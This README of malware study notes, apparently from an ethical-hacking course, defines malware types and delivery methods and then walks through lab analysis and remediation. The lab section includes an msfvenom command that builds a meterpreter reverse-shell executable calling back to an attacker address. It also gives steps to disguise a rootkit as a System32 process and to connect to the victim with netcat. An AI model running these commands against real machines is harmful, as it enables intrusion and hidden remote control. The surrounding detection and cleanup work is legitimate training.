README.md

Malware Threats

1. What is malware
2. Malware delivery
3. Analyze and classify malware

1. Malware

• A. Virus
• B. Worm
• C. Trojan
• D. Hybrid
• E. Ransomware & Crypto-malware
• F. Fileless
• G. Adware
• H. Spyware
  • Keylogger
• I. Rootkit
• J. Bots / Botnets
• K. RATs
• L. Logic or Time bomb
• M. Backdoor
• N. APT

A. Virus

A program intended to damage a host (computer system) and requires user interaction

Different types of viruses

• Armored: protected in a way that makes disassembling it difficult. Thus, antivirus programs have trouble getting to, and understanding, its code.
• Companion: creates a new program that runs in the place of an expected program of the same name.
• Macro: software exploitation virus that works by using the macro feature included in many applications, such as Microsoft Office.
• Multipartite: attacks a system in more than one way.
• Phage: modifies and alters other programs.
• Polymorphic: changes form or mutates in order to avoid detection.
• Retro: attacks or bypasses the antirivrus software.
• Stealth: attempts to avoid detection by anti-virus software and from OS by reamaining in memory.

B. Worm

• Self-propagate without user intervention.
• To spread, worms either exploit a vulnerability on the target system, or use social engineering.
• Usually takes advantage of file-transport or informartion-transport features to travel unaided.
• Examples
  • Self-propagate
  • SQL Slammer
  • ILoveYou
  • MS Blaster
  • Slammer

C. Trojan

Harmful piece of software that looks legitimate or is included with legitimate applications.

• User interaction
• Any application that masquerades as one thing in order to get past scrutiny and then does something malicious.
  • Email or websites
  • Fake antivirus/updates pop ups
• One major difference with viruses is that trojans tend not to replicate themsleves.
• Examples
  • BackOrifice
  • Stuxnet
  • Zeus

D. Hybrid

Combine different types into a hybrid type.

E. Ransomware & Crypto-malware

• Uses cryptography as part of the attack
• Prevents user from accesing their files through encryption.
• Examples
  • WannaCry
  • CryptoLocker
  • Locky

F. Fileless

• Running malware at the memory level instead of file level
• Registry keys
• Scheduled tasks
• APIs

• 50%

G. Adware

• Ads
• Browser
• Freeware

H. Spyware

• Covert monitoring
• Harvest browsing information
• Stealing Credentials
• Screen capture
• Capture email data

I Rootkit

• Designed to provide continued privileged access to a computer while actively hiding its presence.
• Ability to obtain administrator/root-level access and hide from OS.
• Examples
  • NTRootkit
  • Zeus
  • Stuxnet
  • Knark
  • Adore

J. Bots / Botnets

A Bot is an automated software program. In its malicious form, is a compromised system being controlled remotely.

A Botnet is a network of compromised computers under the control of a malicious actors.

Keylogger

Tracks the activities from input devices (keyboard, mouse, screen recorders, scrapers, etc), which is either accessed later or automatically emailed to the attacker.

K. RATs (Remote Access Trojans or Remote Administration Tools)

• Software that remotely gives a person full control of a tech device.
• Provide the capability to allow covert surveillance or gain unauthorized access to devices and create backdoors.
• Examples
  • SubSeven
  • Back Orifice
  • ProRat
  • Turkojan
  • Poison-Ivy

L. Logic or Time bomb

Any code that is hidden within an application and causes something unexpected to happen based on some criteria.

M. Backdoor

• Any undocoumented way of accessing a system and bypassing normal authentication mechanisms.

• An opening left in a program application (usually by the developer) that allows additional access to systems or data. These should be closed when the system is moved to production.

N. APT (Advanced Persistent Threat)

A set of stealthy and continuous computer hacking processes, often orchestrated by an actor targeting a specific entity.

The actor usually targets either private organizations, states, or both, for business or political motives.

---

2. Malware Delivery

• Malvertising
• Phishing
• Removable devices (usb)
• Insider Threat

Malvertising

• Drive-by downloads that execute code without user interaction
• Common in news portals

Phishing

• Attacker uses fraudulent communication (such as emails) to lure victim into running malicious software or providing confidential information.
• Message is made to look as though it comes from a trusted sender.

---

3. Analyze and Classify

Static analysis with Kali Linux

Suppose you are given samples from email attachments.

1. Emulate the malicious file.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse-tcp LHOST=192.168.0.100 LPORT=433 -f exe -o maliciousfile.exe

2. Using Binwalk we will performed an automated analysis by scanning for common signatures.

binwalk -B maliciousfile.exe    // static analysis
binwalk -3 maliciousfile.exe    // 3D analysis
binwalk -A maliciousfile.exe    // Find commonly used No Operation Opcodes (NOP) used in exploits to land shellcode.

3. Using Exiftool we can produce similar information.

exiftool maliciousfile.exe

4. Hash file with MD5Deep and add this to your analysis report for future references.

md5deep maliciousfile.exe

RootKit discovering with Windows

We can use the Rootkit Revealer Tool.

1. Place a rootkit, you can use a simple rootkit such as HackerDefender from carnal0wnage, let's run cmd and the following commands.

tasklist                    // list processes & choose a process to mimic, we will use some similar name
netstat -an                 // find currently open ports, pick one next to the legitimate ones already open
cd "C:\Windows\System32"    // change directory to the rootkit, so it looks like a legitimate system file
rename <rootkey EXE> <fake_process_name>.exe
rename <rootkey INI> <fake_process_name>.ini

2. Make sure rootkey is properly configured (.ini file) with fake process name, ports and settings and load initializatio nfile into memory.

<fake_process_name>.ini -:refresh

3. Run rootkit

./<fake_process_name>.exe

4. Now lunch Rootkit Revealer and scan. You should discover your rootkit if using well known files such as HackerDefender example.

Rootkit exploitation example

If you were happen to use HackerDefender rootkit, you would be able to connect with Netcat to victim.

netcat <target_ip> <open_port>
hostname // verify connection

Remediation

1. Find suspicious processes with Rootkit Revealer and cmd -> tasklist.
2. Stop suspicious process with taskkill /F /pid <PID#>.
3. Confirm suspicious service in services.msc.
4. Delete suspicious service sc delete <service name>.
5. Using registry information from Rootkit Revelear, find those keys in regedit and delete everything you can.
6. Verify RootKit removal running scans again.